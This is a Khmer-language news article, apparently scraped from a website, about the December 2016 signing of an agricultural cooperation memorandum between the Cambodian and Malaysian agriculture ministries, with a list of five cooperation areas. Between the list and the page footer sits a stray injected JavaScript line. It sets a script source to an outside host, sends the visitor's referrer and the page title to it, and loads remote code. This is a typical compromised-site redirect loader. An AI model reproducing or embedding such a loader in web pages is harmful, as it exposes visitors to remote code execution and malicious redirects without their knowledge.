Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ពិធីចុះអនុស្សារណៈនៃការយោគយល់គ្នាលើកិច្ចសហប្រតិបត្តិការវិស័យកសិកម្ម រវាងក្រសួងកសិកម្ម រុក្ខាប្រមាញ់និងនេសាទនៃព្រះរាជាណាចក្រកម្ពុជា ជាមួយក្រសួងកសិកម្ម និងមូលដ្ឋានកសិឧស្សាហកម្មនៃប្រទេសម៉ាឡេស៊ី

ម៉ាឡេសុី៖ នៅរសៀលថ្ងៃទី៩ ខែធ្នូ ឆ្នាំ២០១៦ នៅទីក្រុងកូឡាឡាំពួរ នៃប្រទេសម៉ាឡេស៊ី គឺមានរៀបចំពិធីចុះអនុស្សារណៈនៃការយោគយល់គ្នាលើកិច្ចសហប្រតិបត្តិការវិស័យកសិកម្ម រវាងក្រសួងកសិកម្ម រុក្ខាប្រមាញ់និងនេសាទនៃព្រះរាជាណាចក្រកម្ពុជា ជាមួយក្រសួងកសិកម្ម និងមូលដ្ឋានកសិឧស្សាហកម្មនៃប្រទេសម៉ាឡេស៊ី ។ សូមបញ្ជាក់ថា៖ អនុស្សារណៈនៃការយោគយល់គ្នាលើកិច្ចសហប្រតិបត្តិការលើវិស័យកសិកម្មនេះបានផ្តួចផ្តើមគំនិតដោយក្រសួងទាំងពីរ ដោយគិតចាប់តាំងពីការជួបជុំគ្នានៅក្នុងកិច្ចប្រជុំលើកទី២ នៃគណកម្មការចម្រុះសហប្រតិបត្តិការទ្វេភាគី កម្ពុជា ម៉ាឡេស៊ី នៅខេត្តសៀមរាប កាលពីខែមិថុនាឆ្នាំ២០០៦ មកម្ល៉េះ។ កិច្ចសហប្រតិបត្តិការរវាងក្រសួងទាំងពីរនេះគឺផ្តោតទៅលើ៖
1) លើដំណាំកសិកម្ម
2) ការធ្វើវារីវប្បកម្ម និងការអភិរក្សជលផល
3) ផលិតកម្មសត្វ
4) ការផ្លាស់ប្តូរការសិក្សា ទស្សនៈកិច្ចសិក្សា និងស្រាវជ្រាវវិស័យកសិកម្ម និង
5) ការគ្រប់គ្រងភូតគាមអនាម័យ ។

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More